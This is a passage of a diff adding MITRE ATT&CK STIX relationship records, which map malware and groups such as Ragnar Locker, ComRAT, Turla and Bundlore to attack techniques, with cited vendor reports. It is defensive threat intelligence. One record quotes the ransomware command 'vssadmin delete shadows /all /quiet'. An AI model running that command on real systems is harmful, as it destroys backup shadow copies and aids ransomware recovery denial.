+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9212f940-021e-49b1-b500-fa1dd76b7132",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.847Z",
+ "created": "2020-06-30T00:39:39.847Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has attempted to terminate/stop processes and services associated with endpoint security products.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ca33387d-495a-460a-86da-d5f8d8adda31",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.881Z",
+ "created": "2020-06-30T00:39:39.881Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) may attempt to connect to removable drives and mapped network drives.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ea79bf34-c1ba-4523-879f-441d6a4a9e5e",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.885Z",
+ "created": "2020-06-30T00:39:39.885Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) can delete volume shadow copies using vssadmin delete shadows /all /quiet.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--06dd311f-393f-4c24-beee-19d690ae4ba2",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.891Z",
+ "created": "2020-06-30T00:39:39.891Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to execute a service that it creates.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--347de212-26bf-4ad4-963f-c4dfa3c821d1",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.895Z",
+ "created": "2020-06-30T00:39:39.895Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has used sc.exe to create a new service for the VirtualBox driver.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b7573d56-3acb-464f-b63b-3734af37ad42",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.898Z",
+ "created": "2020-06-30T00:39:39.898Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has used rundll32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--e22af0ee-ab7a-4989-9077-fe538a3ad03d",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.941Z",
+ "created": "2020-06-30T00:39:39.941Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has used cmd.exe and batch scripts to execute commands.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3a20bdab-0c73-49be-a8b5-630787814773",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.951Z",
+ "created": "2020-06-30T00:39:39.951Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--54895630-efd2-4608-9c24-319de972a9eb",
+ "target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
+ "external_references": [
+ {
+ "source_name": "Sophos Ragnar May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/",
+ "description": "SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020."
+ }
+ ],
+ "description": "[Ragnar Locker](https://attack.mitre.org/software/S0481) has used regsvr32.exe to execute components of VirtualBox.(Citation: Sophos Ragnar May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--af1edc78-f0b2-450c-b91f-fe1646589173",
+ "type": "relationship",
+ "modified": "2020-06-30T00:39:39.953Z",
+ "created": "2020-06-30T00:39:39.953Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) can use email attachments for command and control.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0b2b0719-c82e-4d1f-b34c-7ed5dd5c8968",
+ "type": "relationship",
+ "modified": "2020-06-30T22:03:27.016Z",
+ "created": "2020-06-30T22:03:27.016Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has used a custom .NET tool to collect documents from an organization's internal central database.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b3e2abaa-f431-4791-95d0-d44f3a74a73f",
+ "type": "relationship",
+ "modified": "2020-06-30T22:24:45.570Z",
+ "created": "2020-06-30T22:12:28.108Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
+ "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) has infected victims using watering holes.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5e8f23be-48b6-4236-9475-89f11e769ee6",
+ "type": "relationship",
+ "modified": "2020-06-30T22:12:28.116Z",
+ "created": "2020-06-30T22:12:28.116Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) has used a task name associated with Windows SQM Consolidator.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--f4303403-0d93-4267-ba4c-a1d4e20d87cd",
+ "type": "relationship",
+ "modified": "2020-07-06T14:40:26.270Z",
+ "created": "2020-06-30T22:35:00.791Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) can check the victim's default browser to determine which process to inject its communications module into.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--31029adf-2b28-4d7f-bdd3-b07f55374eae",
+ "type": "relationship",
+ "modified": "2020-06-30T22:40:28.118Z",
+ "created": "2020-06-30T22:40:28.118Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
+ "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
+ "external_references": [
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) can check the default browser by querying HKCR\\http\\shell\\open\\command.(Citation: ESET ComRAT May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b511900a-9bfe-4f8c-b1e2-b95669a5eaeb",
+ "type": "relationship",
+ "modified": "2020-06-30T22:40:28.140Z",
+ "created": "2020-06-30T22:40:28.140Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
+ "target_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd",
+ "relationship_type": "mitigates",
+ "description": "Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.",
+ "id": "relationship--0058d5dd-bf42-4a09-94ff-dfb024b949df",
+ "type": "relationship",
+ "modified": "2020-07-01T18:23:25.245Z",
+ "created": "2020-07-01T18:23:25.245Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd",
+ "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
+ "relationship_type": "subtechnique-of",
+ "id": "relationship--624c4ae2-f367-4be2-a584-0fb5ec94c694",
+ "type": "relationship",
+ "modified": "2020-07-01T18:23:25.252Z",
+ "created": "2020-07-01T18:23:25.252Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5bcd5511-6756-4824-a692-e8bb109364af",
+ "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
+ "external_references": [
+ {
+ "source_name": "Chaos Stolen Backdoor",
+ "description": "Sebastian Feldmann. (2018, February 14). Chaos: a Stolen Backdoor Rising Again. Retrieved March 5, 2018.",
+ "url": "http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/"
+ }
+ ],
+ "description": "[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.(Citation: Chaos Stolen Backdoor)",
+ "relationship_type": "uses",
+ "id": "relationship--788ec1d9-9192-46c9-8bc3-7397ccb854df",
+ "type": "relationship",
+ "modified": "2020-07-01T18:30:55.443Z",
+ "created": "2020-07-01T18:30:55.443Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--3d8e547d-9456-4f32-a895-dc86134e282f",
+ "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
+ "external_references": [
+ {
+ "source_name": "Umbreon Trend Micro",
+ "description": "Fernando Merc\u00eas. (2016, September 5). Pok\u00e9mon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046"
+ }
+ ],
+ "description": "[Umbreon](https://attack.mitre.org/software/S0221) provides additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet.(Citation: Umbreon Trend Micro)",
+ "relationship_type": "uses",
+ "id": "relationship--85af8200-2e4c-4253-a334-0390ac4065f8",
+ "type": "relationship",
+ "modified": "2020-07-01T18:32:47.416Z",
+ "created": "2020-07-01T18:32:47.416Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8787e86d-8475-4f13-acea-d33eb83b6105",
+ "target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
+ "external_references": [
+ {
+ "source_name": "Chronicle Winnti for Linux May 2019",
+ "url": "https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a",
+ "description": "Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020."
+ }
+ ],
+ "description": "[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism.(Citation: Chronicle Winnti for Linux May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--76625152-3f62-4a1e-a769-5503811b0276",
+ "type": "relationship",
+ "modified": "2020-07-01T18:34:02.855Z",
+ "created": "2020-07-01T18:34:02.855Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has disguised a malicious .app file as a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--10c609ce-f256-436c-8288-3441cb123fc5",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.251Z",
+ "created": "2020-07-01T20:27:58.395Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has attempted to get users to execute a malicious .app file that looks like a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a77d7668-db79-46b0-960a-cfa39db781fa",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.328Z",
+ "created": "2020-07-01T20:27:58.407Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has been spread through malicious advertisements on websites.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2ee78986-9275-4248-9fde-125c3312b657",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.318Z",
+ "created": "2020-07-01T20:27:58.429Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) prompts the user for their credentials.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9480dac9-9192-4966-a622-0ca561b59f16",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.323Z",
+ "created": "2020-07-01T20:35:01.949Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can download and execute new versions of itself.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6b69d848-b3d9-4f8f-96dc-381e1dd793d4",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.324Z",
+ "created": "2020-07-01T20:35:01.953Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2063f611-1da2-4a62-bbb6-38b37580679f",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.370Z",
+ "created": "2020-07-01T20:35:01.969Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) can change macOS security settings and browser preferences to enable follow-on behaviors.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fe8efec3-2ab4-497d-8e5a-b2340feddd8f",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.327Z",
+ "created": "2020-07-01T21:05:18.822Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has used the ps command to list processes.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1e10af38-1695-45ab-8db2-8cd476a58a45",
+ "type": "relationship",
+ "modified": "2020-07-01T21:30:17.366Z",
+ "created": "2020-07-01T21:05:18.827Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) has used openssl to decrypt AES encrypted payload data. [Bundlore](https://attack.mitre.org/software/S0482) has also used base64 and RC4 with a hardcoded key to deobfuscate data.(Citation: MacKeeper Bundlore Apr 2019)",
+ "relationship_type": "uses",
